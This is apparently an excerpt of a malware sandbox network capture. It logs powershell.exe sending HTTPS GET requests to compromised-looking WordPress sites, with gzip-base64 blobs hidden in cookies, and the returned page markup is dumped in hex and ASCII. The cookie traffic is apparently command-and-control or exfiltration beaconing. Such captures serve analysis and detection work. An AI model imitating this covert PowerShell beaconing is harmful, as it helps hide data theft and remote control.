                                                    2024-12-18 10:20:34 UTC8192INData Raw: 32 30 30 30 0d 0a 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 72 69 64 67 65 2f 63 73 73 2f 65 6c 65 67 61 6e 74 2d 69 63 6f 6e 73 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 36 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 72 69 64 67 65 2d 71 6f 64 65 2d 6c 69 6e 65 61 5f 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69 74 61 6c 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 72 69 64 67 65 2f 63 73 73 2f 6c 69 6e 65 61 2d 69 63 6f 6e 73 2f 73 74 79 6c 65 2e 63 73 73 3f
                                                    Data Ascii: 2000.au/wp-content/themes/bridge/css/elegant-icons/style.min.css?ver=6.6.2' type='text/css' media='all' /><link rel='stylesheet' id='bridge-qode-linea_icons-css' href='https://acceleratedigital.com.au/wp-content/themes/bridge/css/linea-icons/style.css?
                                                    2024-12-18 10:20:34 UTC6INData Raw: 2e 34 2e 38 22 20
                                                    Data Ascii: .4.8"
                                                    2024-12-18 10:20:34 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:34 UTC8192INData Raw: 32 30 30 30 0d 0a 69 64 3d 22 74 70 2d 74 6f 6f 6c 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69 74 61 6c 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 72 73 36 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 31 31 22 20 69 64 3d 22 72 65 76 6d 69 6e 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69
                                                    Data Ascii: 2000id="tp-tools-js"></script><script type="text/javascript" src="https://acceleratedigital.com.au/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.4.11" id="revmin-js"></script><link rel="https://api.w.org/" href="https://acceleratedigi


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.11.2049732129.232.136.1704438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:20:45 UTC2253OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: wickandjuice.co.za
                                                    Connection: Close
                                                    2024-12-18 10:20:47 UTC422INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:20:45 GMT
                                                    Server: Apache
                                                    Link: <https://wickandjuice.co.za/wp-json/>; rel="https://api.w.org/", <https://wickandjuice.co.za/wp-json/wp/v2/pages/2139>; rel="alternate"; type="application/json", <https://wickandjuice.co.za/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:20:47 UTC7770INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 5a 41 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74
                                                    Data Ascii: 2000<!DOCTYPE html><html lang="en-ZA" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="htt
                                                    2024-12-18 10:20:47 UTC428INData Raw: 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74
                                                    Data Ascii: :"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everyt
                                                    2024-12-18 10:20:47 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:47 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: 2000orts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&
                                                    2024-12-18 10:20:47 UTC6INData Raw: 78 20 72 67 62 61
                                                    Data Ascii: x rgba
                                                    2024-12-18 10:20:47 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:47 UTC8192INData Raw: 32 30 30 30 0d 0a 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32
                                                    Data Ascii: 2000(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2
                                                    2024-12-18 10:20:47 UTC6INData Raw: 3d 27 65 6c 65 63
                                                    Data Ascii: ='elec
                                                    2024-12-18 10:20:47 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:20:47 UTC8192INData Raw: 32 30 30 30 0d 0a 74 72 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6c 65 63 74 72 6f 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 79 69 74 68 5f 79 77 72 61 71 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63
                                                    Data Ascii: 2000tro-style-css' href='https://wickandjuice.co.za/wp-content/themes/electro/style.min.css?ver=3.0.3' type='text/css' media='all' /><link rel='stylesheet' id='yith_ywraq_frontend-css' href='https://wickandjuice.co.za/wp-content/plugins/yith-woocommerc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.11.2049733194.163.167.354431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:20:56 UTC2249OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: saeedmdcat.com
                                                    Connection: Close
                                                    2024-12-18 10:20:56 UTC420INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:20:56 GMT
                                                    Server: Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
                                                    Vary: Cookie,User-Agent,Accept-Encoding
                                                    Accept-Ranges: bytes
                                                    Content-Length: 65713
                                                    Cache-Control: max-age=3600, public
                                                    Expires: Wed, 18 Dec 2024 10:20:56 GMT
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Powered-By: WP Rocket/3.8.7
                                                    Pragma: public
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:20:56 UTC7772INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c
                                                    Data Ascii: <!doctype html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><style>img:is([sizes="auto" i],
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 61 6c 54 72 61 63 6b 65 72 2e 74 72 61 63 6b 65 72 73 5b 68 6f 6f 6b 4e 61 6d 65 5d 28 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 28 27 65 76 65 6e 74 27 2c 20 6e 61 6d 65 2c 20 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 5f 5f 67 74 61 67 54 72 61 63 6b 65 72 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 09 09 09 09 09 5f 5f 67 74 61 67 54
                                                    Data Ascii: alTracker.trackers[hookName](parameters);} else {__gtagDataLayer('event', name, parameters);}} else {__gtagDataLayer.apply(null, arguments);}}__gtagTracker('js', new Date());__gtagT
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 65 6e 74 2d 73 69 7a 65 3a 20 38 30 30 70 78 3b 2d 2d 77 70 2d 2d 73 74 79 6c 65 2d 2d 67 6c 6f 62 61 6c 2d 2d 77 69 64 65 2d 73 69 7a 65 3a 20 31 32 30 30 70 78 3b 20 7d 3a 77 68 65 72 65 28 62 6f 64 79 29 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 20 7b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 7b 20 6a 75 73 74 69 66 79 2d 63
                                                    Data Ascii: ent-size: 800px;--wp--style--global--wide-size: 1200px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-c
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 68 65 6d 65 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65
                                                    Data Ascii: hello-elementor/style.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://saeedmdcat.com/wp-content/themes/hello-elementor/theme.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-ele
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 2d 31 30 36 30 22 3e 0a 0a 0a 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 20 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 64 79 6e 61 6d 69 63 2d 68 65 61 64 65 72 20 6d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 69 6e 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 62 72 61 6e 64 69 6e 67
                                                    Data Ascii: 9 elementor-page elementor-page-1060"><a class="skip-link screen-reader-text" href="#content">Skip to content</a><header id="site-header" class="site-header dynamic-header menu-dropdown-mobile"><div class="header-inner"><div class="site-branding
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 32 35 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 6b 69 70 73 2d 73 75 70 65 72 2d 66 69 6e 61 6c 2d 73 65 73 73 69 6f 6e 32 30 32 30 2f 22 3e 4b 49 50 53 20 53 55 50 45 52 20 46 49 4e 41 4c 20 53 45 53 53 49 4f 4e 28 32 30 32 30 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 34 30 38 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70
                                                    Data Ascii: m-type-post_type menu-item-object-page menu-item-1252"><a href="https://saeedmdcat.com/kips-super-final-session2020/">KIPS SUPER FINAL SESSION(2020)</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1408"><a href="http
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 6d 67 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 33 30 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78 33 30 30 2e 6a 70 65 67 22 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 6d 65 64 69 75 6d 20 73 69 7a 65 2d 6d 65 64 69 75 6d 20 77 70 2d 69 6d 61 67 65 2d 31 33 35 37 22 20 61 6c 74 3d 22 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78
                                                    Data Ascii: mg decoding="async" width="300" height="300" src="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x300.jpeg" class="attachment-medium size-medium wp-image-1357" alt="" srcset="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x
                                                    2024-12-18 10:20:57 UTC8000INData Raw: 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 74 2e 6f 70 74 69 6f 6e 73 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                                                    Data Ascii: tion(t){this.triggerEvents.forEach(function(e){return window.addEventListener(e,t.userEventListener,t.options)})}},{key:"_removeEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.removeEventListener(e,t.userEventListener
